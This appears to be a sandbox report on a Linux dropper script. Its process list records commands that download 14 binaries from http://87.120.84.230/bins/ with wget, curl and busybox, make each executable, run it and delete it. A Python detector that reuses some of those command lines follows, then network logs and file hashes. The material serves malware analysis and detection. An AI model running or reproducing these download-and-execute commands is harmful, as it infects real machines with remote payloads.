N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (row repeated 28 times: one read per curl invocation)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]
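
The process list above records the same sequence for each of the 14 payload names: fetch the file from http://87.120.84.230/bins/<name> with wget, then curl -O, then busybox wget (so that at least one fetch succeeds on a host that ships only one of those tools), chmod 777 it, execute it from the working directory, and delete it, with the whole loop run twice. The Python below is an added example and is not part of the sandbox report or of the sample: it takes a list of process command lines, flags the fetch -> chmod 777 -> execute -> delete chain per payload name, and pulls the download URLs and hosts out as IOCs. COMMAND_LINES is constructed from the report's own entries for the first two payloads; the function names and the decision to require mode 777 are choices made here, not anything the sandbox emits.

```python
"""Flag the fetch -> chmod 777 -> execute -> delete dropper loop in sandbox
process command lines and extract the network IOCs from it.

Added example, not part of the report or the sample. COMMAND_LINES is
constructed from the Processes section of the report (first two payloads).
"""
import re
import shlex
from collections import defaultdict

COMMAND_LINES = [
    "/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh",
    "/bin/rm bins.sh",
    "wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe",
    "wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
    "curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
    "/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
    "chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
    "./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
    "rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5",
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCHERS = {"wget", "curl", "busybox"}      # "busybox wget" counts as a fetch
CHAIN = ("fetch", "chmod", "exec", "rm")     # the order the dropper uses


def basename(path):
    return path.rsplit("/", 1)[-1]


def classify(cmdline):
    """Map one command line to (action, payload_name), or None if irrelevant.

    The payload name is what joins the steps: the URL's last path element for
    a fetch, the file operand for chmod/rm, the program name for ./<name>.
    """
    argv = shlex.split(cmdline)
    if not argv:
        return None
    prog = basename(argv[0])
    if prog in FETCHERS:
        urls = [a for a in argv if URL_RE.fullmatch(a)]
        return ("fetch", basename(urls[0])) if urls else None
    if prog == "chmod" and len(argv) >= 3:
        # Only mode 777 is treated as part of the chain (what this sample does).
        return ("chmod", basename(argv[-1])) if argv[1] == "777" else None
    if prog == "rm" and len(argv) >= 2:
        return ("rm", basename(argv[-1]))
    if argv[0].startswith(("./", "/tmp/")):
        return ("exec", basename(argv[0]))
    return None


def find_drop_chains(cmdlines):
    """Return payload names for which every step of CHAIN was seen in order.

    Extra fetches of the same name (the wget/curl/busybox fallback) are
    ignored; a completed chain resets so a second pass is reported again.
    """
    progress = defaultdict(int)   # payload name -> index of next expected step
    complete = []
    for line in cmdlines:
        hit = classify(line)
        if hit is None:
            continue
        action, name = hit
        if CHAIN[progress[name]] == action:
            progress[name] += 1
        if progress[name] == len(CHAIN):
            complete.append(name)
            progress[name] = 0
    return complete


def extract_iocs(cmdlines):
    """Distinct download URLs, hosts and dropped file names, sorted."""
    urls = {u for line in cmdlines for u in URL_RE.findall(line)}
    hosts = {u.split("://", 1)[1].split("/", 1)[0] for u in urls}
    return {"urls": sorted(urls), "hosts": sorted(hosts),
            "files": sorted(basename(u) for u in urls)}


if __name__ == "__main__":
    for name in find_drop_chains(COMMAND_LINES):
        print("drop-and-run chain:", name)
    print(extract_iocs(COMMAND_LINES))
```

Joining the steps on the payload name rather than on process ancestry is deliberate: a sandbox's flat process list loses the parent/child relationship once the script forks, but the dropper has to name the same file in every step, so the name is the stable key. Feeding the full Processes section in (all 14 names, both passes) yields each name twice and a single host, 87.120.84.230.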

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

(84 identical rows collapsed: every connection in this run was plain HTTP to 87.120.84.230:80, and there is no DNS traffic because the dropper addresses the server by bare IP. The count is consistent with the process list: 14 payload names fetched in two passes, each pass trying wget, curl and busybox wget, which is 28 x 3 = 84 connection attempts.)

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97